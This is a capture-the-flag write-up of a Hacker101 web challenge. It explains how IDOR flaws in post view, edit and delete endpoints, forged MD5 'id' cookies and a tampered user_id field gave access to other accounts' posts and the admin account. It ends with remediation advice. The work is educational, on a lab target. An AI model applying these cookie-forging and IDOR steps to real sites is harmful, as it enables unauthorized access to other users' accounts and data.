You can register an account by clicking on Sign up. I registered an account with username=mhackerone&password=mhackerone and then logged in.
HomePage
It is a web application where you can create both private and public posts, with the ability to edit and delete them once created. At first, the URL made me think of an LFI (Local File Inclusion) due to the page= parameter, as we can see in: https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com/index.php?page=home.php.However, after a few attempts, I realized that LFI was not present. While inspecting the pages, I found an IDOR.
Post View
As we can see in the URL https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com/index.php?page=view.php&id=3, there is the id parameter that indicates which post we are currently viewing. By changing it, it is possible to see posts from other accounts (even private ones!). Let’s proceed to the exploitation phase, explaining the other vulnerabilities along the way.
🔬 Vulnerability Analysis
Potential Vulnerabilities
IDOR (Insecure Direct Object Reference)
IDOM (Insecure Direct Object Manipulation)
Predictable Cookie
Brute-force attack
🎯 Solution Path
Exploitation Steps
Initial setup
After inspecting the pages a bit more, I decided to try exploiting the IDOR. Let’s move on to the next phase.
Exploitation
As we can see from the image of the homepage, when we log in, only two posts are visible, but the ID of the second post is 3. I therefore assume that there is a hidden second post. In fact, by trying to change the ID to 2:https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com/index.php?page=view.php&id=2, I was able to find the first flag.
Continuing to inspect the page, I found some session cookies:
Cookies
Which, at first glance, appear to be a hash. When I tried to analyze them using https://www.dcode.fr/cipher-identifier, the result that came out was indeed an MD5 hash:
Obtaining the result 3. Since the cookie name is id, I immediately thought it was the ID associated with my account. In fact, by closely examining the homepage image, you can notice that there are two posts, one with the username user and the other with the username admin (which are the two default accounts created each time a session for the challenge starts), so mine is the third one… With this, I didn’t waste any more time and immediately generated the MD5 of 1 (since the admin is usually the first account).
1
2
importhashlibprint(hashlib.md5(b'1').hexdigest())
MD5 '2'
And by inserting the freshly generated hash in place of the previous value in the cookies and refreshing the page with F5, I was able to find the second flag (it was also possible to use an online tool like https://www.md5.cz/). Then, I did the same for ID 2 and found another flag associated with the user account. (By reading the post-solution writeups, I discovered that it was also possible to brute-force the password, so I applied this method in the automated exploit).
Later, I logged in again with my account and tried to create posts, noticing that during creation, a user_id parameter was specified, which assigned the post to the account that created it. I immediately thought that this id could also be manipulated.
User_id
I then tried to change the value of the parameter directly in the form’s HTML:
Modified User_id
By creating a new post, I was able to obtain the flag. I then checked if it was possible to do the same during the deletion and modification of posts, and indeed, it was possible, allowing me to obtain two more flags. For the modification, in the URL https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com/index.php?page=edit.php&id=4, the id of the post being modified was specified, but by changing it, I could modify other posts. By modifying a post of another user, I was able to get the flag. As for the delete:
Delete
Inspecting the page, I noticed that clicking on delete triggers a request with href= index.php?page=delete.php&id=a87ff679a2f3e71d9181a67b7542122c. The id is very similar to the one previously seen in MD5, so using the MD5 of 1 that I generated earlier, I made a request specifying the new id, since post 1 does not belong to me. By visiting https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com/index.php?page=delete.php&id=c4ca4238a0b923820dcc509a6f75849b, I obtained the new flag associated with the deletion of someone else’s post, as I was able to delete a post that was not associated with my account.
Verify that the authenticated user has permission to access the requested data before returning it, and always check if the authenticated user is the author of the post before allowing modifications.
Avoid storing the user ID directly in the cookies and use secure sessions with randomized tokens.
Block IPs with too many failed attempts or, after 3-5 failed attempts, require a CAPTCHA (e.g., Google’s reCAPTCHA).
